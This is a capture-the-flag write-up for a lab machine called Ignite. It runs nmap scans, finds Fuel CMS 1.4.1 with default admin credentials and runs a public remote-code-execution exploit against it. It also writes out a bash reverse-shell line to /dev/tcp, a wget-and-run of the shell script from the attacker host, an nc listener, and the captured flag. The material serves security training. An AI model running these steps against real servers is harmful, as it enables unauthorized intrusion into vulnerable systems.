🔗 Ignite
🎯 Target IP: 10.10.166.221
Create a directory for machine on the Desktop and a directory containing the scans with nmap.
su
echo "10.10.166.221 ignite.thm" >> /etc/hosts
mkdir thm/ignite.thm
cd thm/ignite.thm
# At the end of the room
# To clean up the last line from the /etc/hosts file
sed -i '$ d' /etc/hosts
I prefer to start recon by pinging the target, this allows us to check connectivity and get OS info.
ping -c 3 ignite.thm
PING ignite.thm (10.10.166.221) 56(84) bytes of data.
64 bytes from ignite.thm (10.10.166.221): icmp_seq=1 ttl=63 time=61.5 ms
64 bytes from ignite.thm (10.10.166.221): icmp_seq=2 ttl=63 time=62.8 ms
64 bytes from ignite.thm (10.10.166.221): icmp_seq=3 ttl=63 time=63.7 ms
Sending these three ICMP packets, we see that the Time To Live (TTL) is ~64 secs. this indicates that the target is a *nix system (probably Linux), while Windows systems usually have a TTL of 128 secs.
nmap --open -n -Pn -vvv -T4 ignite.thm
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-02 11:12 EDT
Initiating SYN Stealth Scan at 11:12
Scanning ignite.thm (10.10.166.221) [1000 ports]
Discovered open port 80/tcp on 10.10.166.221
Completed SYN Stealth Scan at 11:12, 0.99s elapsed (1000 total ports)
Nmap scan report for ignite.thm (10.10.166.221)
Host is up, received user-set (0.068s latency).
Scanned at 2023-07-02 11:12:22 EDT for 1s
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE REASON
80/tcp open http syn-ack ttl 63
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.24 seconds
Raw packets sent: 1000 (44.000KB) | Rcvd: 1000 (40.004KB)
command | result |
---|---|
sudo | run as root |
sC | run default scripts |
sV | enumerate versions |
A | aggressive mode |
T4 | run a bit faster |
oN | output to file with nmap formatting |
nmap -p80 -sCV -T4 ignite.thm -oN port_scan
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Welcome to FUEL CMS
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|_/fuel/
It looks like there are only one open port on the machine: HTTP.
We can search exploit with searchsploit:
searchsploit fuel cms 1.4
------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------ ---------------------------------
fuel CMS 1.4.1 - Remote Code Execution (1) | linux/webapps/47138.py
Fuel CMS 1.4.1 - Remote Code Execution (2) | php/webapps/49487.rb
Fuel CMS 1.4.1 - Remote Code Execution (3) | php/webapps/50477.py
Fuel CMS 1.4.13 - 'col' Blind SQL Injection (Authenticated) | php/webapps/50523.txt
Fuel CMS 1.4.7 - 'col' SQL Injection (Authenticated) | php/webapps/48741.txt
Fuel CMS 1.4.8 - 'fuel_replace_id' SQL Injection (Authenticated) | php/webapps/48778.txt
------------------------------------------------------------------------------------------------ ---------------------------------
Very good, there're many exploits for this CMS.
Exploring page we found a good info:
To access the FUEL admin, go to:
http://ignite.thm/fuel
User name: admin
Password: admin (you can and should change this password and admin user information after logging in).
Now, we can try to exploit using a RCE exploit, first we download script from searchsploit db:
searchsploit -m 50477.py
Exploit: Fuel CMS 1.4.1 - Remote Code Execution (3)
URL: https://www.exploit-db.com/exploits/50477
Path: /usr/share/exploitdb/exploits/php/webapps/50477.py
Codes: CVE-2018-16763
Verified: False
File Type: Python script, ASCII text executable
cp: overwrite '/home/kali/50477.py'?
Copied to: /home/kali/50477.py
After this, we can launch exploit:
python 50477.py -u http://ignite.thm
We need to do a reverse shell, we start to:
Retrieve our ip address:
ip -br -c a
and create a shell file with nano:
nano shell.sh
Insert this line for a bash reverse shell:
/bin/bash -i >& /dev/tcp/10.0.2.15/3333 0>&1
Setup a Python web server and a nc
listener on 2 different tabs:
1st tab:
python -m http.server
2nd tab:
nc -nvlp 3333
Now, we can return in the exploited Fuel CMS tab, and do this commands:
wget http://10.0.2.15:8000/shell.sh -O shell.sh
bash shell.sh
Reverse shell received in the nc
terminal:
/usr/bin/script -qc /bin/bash /dev/null
cd /home/www-data
ls
cat flag.txt
🚩 Flag 1 (user.txt)
6470e394cbf6dab6a91682cc8585059b